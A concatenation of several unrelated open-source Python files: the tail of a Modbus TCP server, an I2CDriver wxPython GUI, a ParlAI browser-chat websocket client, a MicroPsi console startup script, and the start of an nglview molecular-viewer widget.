word_list = [int(w) & 0xffff for w in word_list]
# secure copy of data to list used by server thread
with cls.words2_lock:
if (address >= 0) and (address + len(word_list) <= len(cls.words2)):
cls.words2[address: address + len(word_list)] = word_list
return True
else:
return None
class ModbusServer(object):
"""Modbus TCP server"""
class ModbusService(BaseRequestHandler):
def recv_all(self, size):
if hasattr(socket, "MSG_WAITALL"):
data = self.request.recv(size, socket.MSG_WAITALL)
else:
# Windows lacks MSG_WAITALL
data = b''
while len(data) < size:
data += self.request.recv(size - len(data))
return data
def handle(self):
while True:
rx_head = self.recv_all(7)
# close connection if no standard 7 bytes header
if not (rx_head and len(rx_head) == 7):
break
# decode header
(rx_hd_tr_id, rx_hd_pr_id,
rx_hd_length, rx_hd_unit_id) = struct.unpack('>HHHB', rx_head)
# close connection if frame header content inconsistency
if not ((rx_hd_pr_id == 0) and (2 < rx_hd_length < 256)):
break
# receive body
rx_body = self.recv_all(rx_hd_length - 1)
# close connection if lack of bytes in frame body
if not (rx_body and (len(rx_body) == rx_hd_length - 1)):
break
# body decode: function code
rx_bd_fc = struct.unpack('B', rx_body[0:1])[0]
# close connection if function code is inconsistent
if rx_bd_fc > 0x7F:
break
# default except status
exp_status = const.EXP_NONE
# functions Read Coils (0x01) or Read Discrete Inputs (0x02)
if rx_bd_fc == const.READ_COILS:
#, const.READ_DISCRETE_INPUTS):
(b_address, b_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested bits
if 0x0001 <= b_count <= 0x07D0:
bits_l = DataBank.get_coils(b_address, b_count)
if bits_l:
# allocate bytes list
b_size = int(b_count / 8)
b_size += 1 if (b_count % 8) else 0
bytes_l = [0] * b_size
# populate bytes list with data bank bits
for i, item in enumerate(bits_l):
if item:
byte_i = int(i/8)
bytes_l[byte_i] = set_bit(bytes_l[byte_i], i % 8)
# format body of frame with bits
tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
# add bytes with bits
for byte in bytes_l:
tx_body += struct.pack('B', byte)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
elif rx_bd_fc == const.READ_DISCRETE_INPUTS:
(b_address, b_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested bits
if 0x0001 <= b_count <= 0x07D0:
bits_l = DataBank.get_discrete_inputs(b_address, b_count)
if bits_l:
# allocate bytes list
b_size = int(b_count / 8)
b_size += 1 if (b_count % 8) else 0
bytes_l = [0] * b_size
# populate bytes list with data bank bits
for i, item in enumerate(bits_l):
if item:
byte_i = int(i/8)
bytes_l[byte_i] = set_bit(bytes_l[byte_i], i % 8)
# format body of frame with bits
tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
# add bytes with bits
for byte in bytes_l:
tx_body += struct.pack('B', byte)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# functions Read Holding Registers (0x03) or Read Input Registers (0x04)
elif rx_bd_fc == const.READ_HOLDING_REGISTERS:
#, const.READ_INPUT_REGISTERS):
(w_address, w_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested words
if 0x0001 <= w_count <= 0x007D:
words_l = DataBank.get_holding_registers(w_address, w_count)
if words_l:
# format body of frame with words
tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
for word in words_l:
tx_body += struct.pack('>H', word)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
elif rx_bd_fc == const.READ_INPUT_REGISTERS:
(w_address, w_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested words
if 0x0001 <= w_count <= 0x007D:
words_l = DataBank.get_input_registers(w_address, w_count)
if words_l:
# format body of frame with words
tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
for word in words_l:
tx_body += struct.pack('>H', word)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Single Coil (0x05)
elif rx_bd_fc is const.WRITE_SINGLE_COIL:
(b_address, b_value) = struct.unpack('>HH', rx_body[1:])
f_b_value = bool(b_value == 0xFF00)
if DataBank.set_coils(b_address, [f_b_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Single Register (0x06)
elif rx_bd_fc is const.WRITE_SINGLE_REGISTER:
(w_address, w_value) = struct.unpack('>HH', rx_body[1:])
if DataBank.set_holding_registers(w_address, [w_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Multiple Coils (0x0F)
elif rx_bd_fc is const.WRITE_MULTIPLE_COILS:
(b_address, b_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated coils
if (0x0001 <= b_count <= 0x07B0) and (byte_count >= (b_count/8)):
# allocate bits list
bits_l = [False] * b_count
# populate bits list with bits from rx frame
for i, item in enumerate(bits_l):
b_bit_pos = int(i/8)+6
b_bit_val = struct.unpack('B', rx_body[b_bit_pos:b_bit_pos+1])[0]
bits_l[i] = test_bit(b_bit_val, i % 8)
# write words to data bank
if DataBank.set_coils(b_address, bits_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Multiple Registers (0x10)
elif rx_bd_fc is const.WRITE_MULTIPLE_REGISTERS:
(w_address, w_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated words
if (0x0001 <= w_count <= 0x007B) and (byte_count == w_count * 2):
# allocate words list
words_l = [0] * w_count
# populate words list with words from rx frame
for i, item in enumerate(words_l):
w_offset = i * 2 + 6
words_l[i] = struct.unpack('>H', rx_body[w_offset:w_offset + 2])[0]
# write words to data bank
if DataBank.set_holding_registers(w_address, words_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
else:
exp_status = const.EXP_ILLEGAL_FUNCTION
# check exception
if exp_status != const.EXP_NONE:
# format body of frame with exception status
tx_body = struct.pack('BB', rx_bd_fc + 0x80, exp_status)
# build frame header
tx_head = struct.pack('>HHHB', rx_hd_tr_id, rx_hd_pr_id, len(tx_body) + 1, rx_hd_unit_id)
# send frame
self.request.send(tx_head + tx_body)
self.request.close()
def __init__(self, host='localhost', port=const.MODBUS_PORT, no_block=False, ipv6=False):
"""Constructor
Modbus server constructor.
:param host: hostname or IPv4/IPv6 address server address (optional)
:type host: str
:param port: TCP port number (optional)
:type port: int
:param no_block: set no block mode, in this mode start() return (optional)
:type no_block: bool
:param ipv6: use ipv6 stack
:type ipv6: bool
"""
# public
self.host = host
self.port = port
self.no_block = no_block
self.ipv6 = ipv6
# private
self._running = False
self._service = None
self._serve_th = None
def start(self):
"""Start the server.
Do nothing if server is already running.
This function will block if no_block is not set to True.
"""
if not self.is_run:
# set class attribute
ThreadingTCPServer.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
ThreadingTCPServer.daemon_threads = True
# init server
self._service = ThreadingTCPServer((self.host, self.port), self.ModbusService, bind_and_activate=False)
# set socket options
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# TODO test no_delay with bench
self._service.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# bind and activate
self._service.server_bind()
self._service.server_activate()
# serve request
if self.no_block:
self._serve_th = Thread(target=self._serve)
self._serve_th.daemon = True
self._serve_th.start()
else:
self._serve()
def stop(self):
"""Stop the server.
Do nothing if server is already not running.
"""
if self.is_run:
self._service.shutdown()
self._service.server_close()
@property
def is_run(self):
"""Return True if server running.
"""
return self._running
def _serve(self):
try:
self._running = True
self._service.serve_forever()
except:
self._service.server_close()
raise
finally:
self._running = False
|
i2cgui.py | #!/usr/bin/env python
import time
import struct
import sys
import os
import re
import csv
import threading
from functools import partial
import serial.tools.list_ports as slp
import serial
try:
import wx
import wx.lib.newevent as NE
except ImportError:
print("i2cgui.py needs wxPython, but it wasn't found.")
print("See https://www.wxpython.org/pages/downloads/")
sys.exit(1)
import i2cdriver
pullup_vals = [
"disabled",
"2.2K",
"4.3K",
"1.5K",
"4.7K",
"1.5K",
"2.2K",
"1.1K",
]
PingEvent, EVT_PING = NE.NewEvent()
def ping_thr(win):
while True:
wx.PostEvent(win, PingEvent())
time.sleep(1)
StopCapture = False
def capture_thr(sd, log_csv):
global StopCapture
c = sd.capture_start(True)
with open(log_csv, 'w') as csvfile:
logcsv = csv.writer(csvfile)
for token in c():
if token:
sd.dumpcount += 1
token.dump(logcsv, "csv") # write to CSV
if StopCapture:
break
StopCapture = False
sd.capture_stop()
class HexTextCtrl(wx.TextCtrl):
def __init__(self, *args, **kwargs):
super(HexTextCtrl, self).__init__(*args, **kwargs)
self.Bind(wx.EVT_TEXT, self.on_text)
def on_text(self, event):
event.Skip()
selection = self.GetSelection()
value = self.GetValue().upper()
hex = " 0123456789ABCDEF"
value = "".join([c for c in value if c in hex])
self.ChangeValue(value)
self.SetSelection(*selection)
class MyDialog(wx.Dialog):
def __init__(self, parent, title):
super(MyDialog, self).__init__(parent, title = title, size = (250,150))
panel = wx.Panel(self)
self.btn = wx.Button(panel, wx.ID_OK, label = "ok", size = (50,20), pos = (75,50))
class Frame(wx.Frame):
def __init__(self, preferred = None):
self.sd = None
def widepair(a, b):
r = wx.BoxSizer(wx.HORIZONTAL)
r.Add(a, 1, wx.LEFT)
r.AddStretchSpacer(prop=1)
r.Add(b, 1, wx.RIGHT)
return r
def pair(a, b):
r = wx.BoxSizer(wx.HORIZONTAL)
r.Add(a, 1, wx.LEFT)
r.Add(b, 0, wx.RIGHT)
return r
def rpair(a, b):
r = wx.BoxSizer(wx.HORIZONTAL)
r.Add(a, 0, wx.LEFT)
r.Add(b, 1, wx.RIGHT)
return r
def epair(a, b):
r = wx.BoxSizer(wx.HORIZONTAL)
r.Add(a, 1, wx.LEFT)
r.Add(b, 1, wx.RIGHT)
return r
def label(s):
return wx.StaticText(self, label = s)
def button(s, f):
r = wx.Button(self, label = s)
r.Bind(wx.EVT_BUTTON, f)
return r
def hbox(items):
r = wx.BoxSizer(wx.HORIZONTAL)
[r.Add(i, 0, wx.EXPAND) for i in items]
return r
def hcenter(i):
r = wx.BoxSizer(wx.HORIZONTAL)
r.AddStretchSpacer(prop=1)
r.Add(i, 2, wx.CENTER)
r.AddStretchSpacer(prop=1)
return r
def vbox(items):
r = wx.BoxSizer(wx.VERTICAL)
[r.Add(i, 0, wx.EXPAND) for i in items]
return r
wx.Frame.__init__(self, None, -1, "I2CDriver")
self.bold = self.GetFont().Bold()
self.addrfonts = [
self.GetFont(),
self.bold
]
self.label_serial = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.label_voltage = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.label_current = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.label_temp = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.label_speed = wx.Choice(self, choices = ["100", "400"])
self.label_speed.Bind(wx.EVT_CHOICE, self.set_speed)
pupch = sorted(set(pullup_vals), reverse = True)
self.label_pullups = wx.Choice(self, choices = pupch)
self.label_pullups.Bind(wx.EVT_CHOICE, self.set_pullups)
self.label_sda = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.label_scl = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.label_uptime = wx.StaticText(self, label = "-", style = wx.ALIGN_RIGHT)
self.dynamic = [
self.label_voltage,
self.label_current,
self.label_temp,
self.label_speed,
self.label_pullups,
self.label_sda,
self.label_scl,
self.label_uptime
]
[d.Enable(False) for d in self.dynamic]
self.Bind(EVT_PING, self.refresh)
def addrbutton(s):
r = wx.RadioButton(self, label = s)
r.Bind(wx.EVT_RADIOBUTTON, self.choose_addr)
return r
self.heat = {i:addrbutton("%02X" % i) for i in range(0x08, 0x78)}
# Be careful here, GridSizer changed between wx 3.x and 4.x
devgrid = wx.GridSizer(8)
devgrid.SetHGap(4)
devgrid.SetVGap(6)
for i,l in sorted(self.heat.items()):
devgrid.Add(l)
self.monitor = False
self.ckM = wx.ToggleButton(self, label = "Monitor mode")
self.ckM.Bind(wx.EVT_TOGGLEBUTTON, self.check_m)
self.capture = False
self.ckC = wx.ToggleButton(self, label = "Capture mode")
self.ckC.Bind(wx.EVT_TOGGLEBUTTON, self.check_c)
self.txVal = HexTextCtrl(self, size=wx.DefaultSize, style=0)
self.rxVal = HexTextCtrl(self, size=wx.DefaultSize, style=wx.TE_READONLY)
txButton = wx.Button(self, label = "write")
txButton.Bind(wx.EVT_BUTTON, partial(self.write, self.txVal))
self.rxCount = wx.SpinCtrl(self, min = 1)
rxButton = wx.Button(self, label = "read")
rxButton.Bind(wx.EVT_BUTTON, self.read)
self.dev_widgets = [txButton, rxButton]
self.reset_button = button("i2c reset", self.reset)
self.stop_button = button("stop", self.stop)
self.stop_button.Enable(False)
self.allw = [self.ckM, self.reset_button]
[w.Enable(False) for w in self.allw]
self.devs = self.devices()
cb = wx.ComboBox(self, choices = sorted(self.devs.keys()), style = wx.CB_READONLY)
cb.Bind(wx.EVT_COMBOBOX, self.choose_device)
self.no_addr()
self.addr = None
[self.hot(i, False) for i in self.heat]
self.started = False
info = vbox([
pair(label("Serial"), self.label_serial),
pair(label("Voltage"), self.label_voltage),
pair(label("Current"), self.label_current),
pair(label("Temp."), self.label_temp),
pair(label("SDA"), self.label_sda),
pair(label("SCL"), self.label_scl),
pair(label("Running"), self.label_uptime),
pair(label("Speed"), self.label_speed),
pair(label("Pullups"), self.label_pullups),
])
vb = vbox([
label(""),
hcenter(cb),
label(""),
hcenter(epair(self.ckM, self.ckC)),
hcenter(self.reset_button),
label(""),
hcenter(info),
label(""),
hcenter(devgrid),
label(""),
hcenter(pair(self.txVal, txButton)),
hcenter(pair(self.rxVal, hbox([self.rxCount, rxButton]))),
label(""),
hcenter(self.stop_button),
label(""),
])
self.SetSizerAndFit(vb)
self.SetAutoLayout(True)
d1 = None
while (d1 is None) and (len(self.devs) > 0):
if preferred in self.devs:
d1 = preferred
else:
d1 = min(self.devs)
try:
self.connect(self.devs[d1])
except:
del self.devs[d1]
d1 = None
cb.Set(sorted(self.devs.keys()))
if d1 is not None:
cb.SetValue(d1)
t = threading.Thread(target=ping_thr, args=(self, ))
t.setDaemon(True)
t.start()
def start(self, rw):
self.sd.start(self.addr, rw)
self.started = True
self.stop_button.Enable(True)
def stop(self, e = None):
self.sd.stop()
self.started = False
self.stop_button.Enable(False)
def reset(self, e = None):
self.sd.reset()
self.started = False
def write(self, htc, e):
if (self.addr is not None) and htc.GetValue():
vv = [int(c,16) for c in htc.GetValue().split()]
self.start(0)
self.sd.write(vv)
def read(self, e):
n = int(self.rxCount.GetValue())
if self.addr is not None:
self.start(1)
r = self.sd.read(n)
bb = struct.unpack("B"*n, r)
self.rxVal.SetValue(" ".join(["%02X" % b for b in bb]))
self.stop()
def devices(self):
if sys.platform in ('win32', 'cygwin'):
return {pi.device: pi.device for pi in slp.comports()}
elif sys.platform == 'darwin':
devdir = "/dev/"
pattern = "^cu.usbserial-(.*)"
else:
devdir = "/dev/serial/by-id/"
pattern = "^usb-FTDI_FT230X_Basic_UART_(........)-"
if not os.access(devdir, os.R_OK):
return {}
devs = os.listdir(devdir)
def filter(d):
m = re.match(pattern, d)
if m:
return (m.group(1), devdir + d)
seldev = [filter(d) for d in devs]
return dict([d for d in seldev if d])
def connect(self, dev):
self.sd = i2cdriver.I2CDriver(dev)
[w.Enable(True) for w in self.allw]
self.refresh(None)
def refresh(self, e):
if self.sd and not self.monitor and not self.capture:
lowhigh = ["LOW", "HIGH"]
self.sd.getstatus()
self.label_serial.SetLabel(self.sd.serial)
self.label_voltage.SetLabel("%.2f V" % self.sd.voltage)
self.label_current.SetLabel("%d mA" % self.sd.current)
self.label_temp.SetLabel("%.1f C" % self.sd.temp)
self.label_speed.SetSelection({100:0, 400:1}[self.sd.speed])
self.label_pullups.SetStringSelection(pullup_vals[self.sd.pullups & 7])
self.label_sda.SetLabel(lowhigh[self.sd.sda])
self.label_scl.SetLabel(lowhigh[self.sd.scl])
days = self.sd.uptime // (24 * 3600)
rem = self.sd.uptime % (24 * 3600)
hh = rem // 3600
mm = (rem // 60) % 60
ss = rem % 60;
self.label_uptime.SetLabel("%d:%02d:%02d:%02d" % (days, hh, mm, ss))
[d.Enable(True) for d in self.dynamic]
if not self.started and (self.sd.sda == 1) and (self.sd.scl == 1):
devs = self.sd.scan(True)
for i,l in self.heat.items():
self.hot(i, i in devs)
def choose_device(self, e):
self.connect(self.devs[e.EventObject.GetValue()])
def no_addr(self):
[w.Enable(False) for w in self.dev_widgets]
def choose_addr(self, e):
o = e.EventObject
v = o.GetValue()
if v:
self.addr = int(o.GetLabel(), 16)
[w.Enable(True) for w in self.dev_widgets]
def check_m(self, e):
self.monitor = e.EventObject.GetValue()
self.sd.monitor(self.monitor)
[d.Enable(not self.monitor) for d in self.dynamic]
if self.monitor:
[self.hot(i, False) for i in self.heat]
def check_c(self, e):
global StopCapture
cm = e.EventObject.GetValue()
# self.sd.monitor(self.monitor)
if cm:
openFileDialog = wx.FileDialog(self, "CSV dump to file", "", "",
"CSV files (*.csv)|*.csv",
wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
openFileDialog.ShowModal()
self.log_csv = openFileDialog.GetPath()
openFileDialog.Destroy()
if self.log_csv == u"":
e.EventObject.SetValue(False)
return
StopCapture = False
self.sd.dumpcount = 0
t = threading.Thread(target=capture_thr, args=(self.sd, self.log_csv))
t.setDaemon(True)
t.start()
else:
StopCapture = True
wx.MessageBox("Capture finished. %d events written to \"%s\"" % (self.sd.dumpcount, self.log_csv), "Message", wx.OK | wx.ICON_INFORMATION)
while StopCapture:
pass
[d.Enable(not cm) for d in self.dynamic]
if cm:
[self.hot(i, False) for i in self.heat]
self.capture = cm
def set_speed(self, e):
w = e.EventObject
s = int(w.GetString(w.GetCurrentSelection()))
self.sd.setspeed(s)
def set_pullups(self, e):
w = e.EventObject
s = w.GetString(w.GetCurrentSelection())
code = pullup_vals.index(s)
self.sd.setpullups(code | (code << 3))
def hot(self, i, s):
l = self.heat[i]
if s:
l.SetForegroundColour((0,0,0))
l.SetFont(self.addrfonts[1])
else:
l.SetForegroundColour((160,) * 3)
l.SetFont(self.addrfonts[0])
l.Enable(s)
if i == self.addr:
[w.Enable(s) for w in self.dev_widgets]
if __name__ == '__main__':
app = wx.App(0)
try:
f = Frame(*sys.argv[1:])
f.Show(True)
app.MainLoop()
except:
import sys, traceback
xc = traceback.format_exception(*sys.exc_info())
dlg = wx.MessageDialog(None, "".join(xc), "i2cgui Error Trap (%s)" % i2cdriver.__version__, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
|
client.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import websocket
import threading
from parlai.core.params import ParlaiParser
from parlai.scripts.interactive_web import WEB_HTML, STYLE_SHEET, FONT_AWESOME
from http.server import BaseHTTPRequestHandler, HTTPServer
SHARED = {}
def setup_interactive(ws):
SHARED['ws'] = ws
new_message = None
message_available = threading.Event()
class BrowserHandler(BaseHTTPRequestHandler):
"""
Handle HTTP requests.
"""
def _interactive_running(self, reply_text):
data = {}
data['text'] = reply_text.decode('utf-8')
if data['text'] == "[DONE]":
print('[ Closing socket... ]')
SHARED['ws'].close()
SHARED['wb'].shutdown()
json_data = json.dumps(data)
SHARED['ws'].send(json_data)
def do_HEAD(self):
"""
Handle HEAD requests.
"""
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self):
"""
Handle POST request, especially replying to a chat message.
"""
if self.path == '/interact':
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self._interactive_running(body)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
model_response = {'id': 'Model', 'episode_done': False}
message_available.wait()
model_response['text'] = new_message
message_available.clear()
json_str = json.dumps(model_response)
self.wfile.write(bytes(json_str, 'utf-8'))
elif self.path == '/reset':
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes("{}", 'utf-8'))
else:
return self._respond({'status': 500})
def do_GET(self):
"""
Respond to GET request, especially the initial load.
"""
paths = {
'/': {'status': 200},
'/favicon.ico': {'status': 202}, # Need for chrome
}
if self.path in paths:
self._respond(paths[self.path])
else:
self._respond({'status': 500})
def _handle_http(self, status_code, path, text=None):
self.send_response(status_code)
self.send_header('Content-type', 'text/html')
self.end_headers()
content = WEB_HTML.format(STYLE_SHEET, FONT_AWESOME)
return bytes(content, 'UTF-8')
def _respond(self, opts):
response = self._handle_http(opts['status'], self.path)
self.wfile.write(response)
def on_message(ws, message):
"""
Prints the incoming message from the server.
:param ws: a WebSocketApp
:param message: json with 'text' field to be printed
"""
incoming_message = json.loads(message)
global new_message
new_message = incoming_message['text']
message_available.set()
def on_error(ws, error):
"""
Prints an error, if occurs.
:param ws: WebSocketApp
:param error: An error
"""
print(error)
def on_close(ws):
"""
Cleanup before closing connection.
:param ws: WebSocketApp
"""
# Reset color formatting if necessary
print("Connection closed")
def _run_browser():
httpd = HTTPServer(('0.0.0.0', 1234), BrowserHandler)
print('Please connect to the link: http://{}:{}/'.format('0.0.0.0', 1234))
SHARED['wb'] = httpd
httpd.serve_forever()
def on_open(ws):
"""
Starts a new thread that loops, taking user input and sending it to the websocket.
:param ws: websocket.WebSocketApp that sends messages to a browser_manager
"""
threading.Thread(target=_run_browser).start()
def setup_args():
"""
Set up args, specifically for the port number.
:return: A parser that parses the port from commandline arguments.
"""
parser = ParlaiParser(False, False)
parser_grp = parser.add_argument_group('Browser Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port to run the browser chat server'
)
return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 34596)
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
"ws://localhost:{}/websocket".format(port),
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
setup_interactive(ws)
ws.run_forever()
|
mesh_startup.py | import os
import time
from micropsi_server.mesh_ipy import IPythonConnection
ipython_client = IPythonConnection()
console_termination_requested = False
def no_exit(code):
pass
def start_runtime_and_console(port=7543):
import micropsi_server
import micropsi_server.micropsi_app
import sys
sys.exit = no_exit
# make sure we have a kernel dir to write to
import jupyter_core
kernel_dir = jupyter_core.paths.jupyter_path('kernels')[0]
if not os.path.isdir(kernel_dir):
print("Creating IPython kernel dir: %s" % kernel_dir)
try:
os.makedirs(kernel_dir)
except Exception as e:
print(e)
print("Cannot create IPython kernel dir, IPython console may not be available.")
def client_daemon():
while micropsi_server.micropsi_app.get_console_info() is None and console_termination_requested is False:
time.sleep(0.1)
if console_termination_requested:
return
ipython_client.ipy_connect(["--existing"])
# Disable IPython client for now, does not start, find out if there's a way around that
# ipython_client_thread = Thread(target=client_daemon)
# ipython_client_thread.start()
micropsi_server.micropsi_app.main(None, port, console=True)
def start_console(kernel_info=None):
import tempfile
import json
if kernel_info is None:
ipython_client.set_connection_args(["--existing"])
while console_termination_requested is False:
time.sleep(0.1)
else:
with tempfile.NamedTemporaryFile(delete=False) as temp:
temp.write(json.dumps(kernel_info).encode())
temp.flush()
ipython_client.set_connection_args(["--existing", temp.name])
while console_termination_requested is False:
time.sleep(0.1)
def request_termination():
global console_termination_requested
console_termination_requested = True
|
widget.py | import base64
import json
import logging
import threading
import time
import uuid
import ipywidgets as widgets
import ipywidgets.embed
import numpy as np
from IPython.display import display
from ipywidgets import (Image, Box, DOMWidget, HBox, VBox, IntSlider, Output, Play, Widget,
jslink)
from ipywidgets import widget as _widget
from traitlets import (Bool, CaselessStrEnum, Dict, Instance, Int, Integer,
List, Unicode, observe, validate)
import traitlets
from . import color, interpolate
from .adaptor import Structure, Trajectory
from .component import ComponentViewer
from .config import BACKENDS
from .player import TrajectoryPlayer, _dry_run
from .remote_thread import RemoteCallThread
from .representation import RepresentationControl
from .shape import Shape
from .stage import Stage
from .utils import py_utils, widget_utils
from .utils.py_utils import (FileManager, _camelize_dict, _update_url,
encode_base64, get_repr_names_from_dict,
seq_to_string)
from .viewer_control import ViewerControl
from ._frontend import __frontend_version__
from .base import BaseWidget
widget_serialization = _widget.widget_serialization
__all__ = ['NGLWidget', 'ComponentViewer']
_EXCLUDED_CALLBACK_AFTER_FIRING = {
'setUnSyncCamera',
'setSelector',
'setDelay',
'autoView',
'_downloadImage',
'_exportImage',
'set_representation_from_backend',
}
def _deprecated(msg):
def wrap_1(func):
def wrap_2(*args, **kwargs):
logging.warn(msg)
return func(*args, **kwargs)
return wrap_2
return wrap_1
def write_html(fp, views, frame_range=None):
# type: (str, List[NGLWidget]) -> None
"""EXPERIMENTAL. Likely will be changed.
Make html file to display a list of views. For further options, please
check `ipywidgets.embed` module.
Parameters
----------
fp : str or file handle
views : a DOMWidget view or a list of views.
frame_range : None or a tuple of int
Examples
--------
>>> import nglview
>>> view = nglview.show_pdbid('1tsu')
>>> view # doctest: +SKIP
>>> nglview.write_html('index.html', [view]) # doctest: +SKIP
>>> nglview.write_html('index.html', [view], frame_range=(0, 5)) # doctest: +SKIP
"""
views = isinstance(views, DOMWidget) and [views] or views
embed = ipywidgets.embed
color = None
theme = None
for k, v in views[0].widgets.items():
if v.__class__.__name__ == '_ColormakerRegistry':
color = v
if v.__class__.__name__ == 'ThemeManager':
theme = v
for v in [color, theme]:
v and views.insert(0, v)
def _set_serialization(views):
for view in views:
if hasattr(view, '_set_serialization'):
view._set_serialization(frame_range=frame_range)
elif isinstance(view, Box):
_set_serialization(view.children)
def _unset_serialization(views):
for view in views:
if hasattr(view, '_unset_serialization'):
view._unset_serialization()
elif isinstance(view, Box):
_unset_serialization(view.children)
_set_serialization(views)
# FIXME: allow add jquery-ui link?
snippet = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.css">\n'
snippet += embed.embed_snippet(views)
html_code = embed.html_template.format(title='nglview-demo',
snippet=snippet)
# from ipywidgets
# Check if fp is writable:
if hasattr(fp, 'write'):
fp.write(html_code)
else:
# Assume fp is a filename:
with open(fp, "w") as f:
f.write(html_code)
_unset_serialization(views)
class NGLWidget(DOMWidget):
_view_name = Unicode("NGLView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("NGLModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_ngl_version = Unicode().tag(sync=True)
# _model_name = Unicode("NGLView").tag(sync=True)
# _model_module = Unicode("nglview-js-widgets").tag(sync=True)
_image_data = Unicode().tag(sync=False)
# use Integer here, because mdtraj uses a long datatype here on Python-2.7
frame = Integer().tag(sync=True)
max_frame = Int(0).tag(sync=True)
background = Unicode('white').tag(sync=True)
loaded = Bool(False).tag(sync=False)
picked = Dict().tag(sync=True)
n_components = Int(0).tag(sync=True)
_view_width = Unicode().tag(sync=True) # px
_view_height = Unicode().tag(sync=True) # px
_scene_position = Dict().tag(sync=True)
_scene_rotation = Dict().tag(sync=True)
# hack to always display movie
# TODO: remove _parameters?
_parameters = Dict().tag(sync=False)
_ngl_full_stage_parameters = Dict().tag(sync=True)
_ngl_original_stage_parameters = Dict().tag(sync=True)
_coordinates_dict = Dict().tag(sync=False)
_camera_str = CaselessStrEnum(['perspective', 'orthographic'],
default_value='orthographic').tag(sync=True)
_camera_orientation = List().tag(sync=True)
_synced_model_ids = List().tag(sync=True)
_synced_repr_model_ids = List().tag(sync=True)
_ngl_view_id = List().tag(sync=True)
_ngl_repr_dict = Dict().tag(sync=True)
_ngl_component_ids = List().tag(sync=False)
_ngl_component_names = List().tag(sync=False)
_ngl_msg = None
_send_binary = Bool(True).tag(sync=False)
_init_gui = Bool(False).tag(sync=False)
gui_style = CaselessStrEnum(['ngl'], allow_none=True).tag(sync=True)
_gui_theme = CaselessStrEnum(['dark', 'light'], allow_none=True).tag(sync=True)
_widget_theme = None
_ngl_serialize = Bool(False).tag(sync=True)
_ngl_msg_archive = List().tag(sync=True)
_ngl_coordinate_resource = Dict().tag(sync=True)
_representations = List().tag(sync=False)
_ngl_color_dict = Dict().tag(sync=True)
_player_dict = Dict().tag(sync=True)
# instance
_iplayer = Instance(widgets.Box,
allow_none=True).tag(sync=True, **widget_serialization)
_igui = Instance(widgets.Tab,
allow_none=True).tag(sync=True, **widget_serialization)
_ibtn_fullscreen = Instance(widgets.Button,
allow_none=True).tag(sync=True, **widget_serialization)
def __init__(self,
structure=None,
representations=None,
parameters=None,
**kwargs):
super().__init__(**kwargs)
self._gui = None
self._init_gui = kwargs.pop('gui', False)
self._theme = kwargs.pop('theme', 'default')
self._widget_image = Image()
self._widget_image.width = 900.
self._image_array = []
# do not use _displayed_callbacks since there is another Widget._display_callbacks
self._event = threading.Event()
self._ngl_displayed_callbacks_before_loaded = []
widget_utils._add_repr_method_shortcut(self, self)
self.shape = Shape(view=self)
self.stage = Stage(view=self)
self.control = ViewerControl(view=self)
self._handle_msg_thread = threading.Thread(
target=self.on_msg, args=(self._ngl_handle_msg, ))
# # register to get data from JS side
self._handle_msg_thread.daemon = True
self._handle_msg_thread.start()
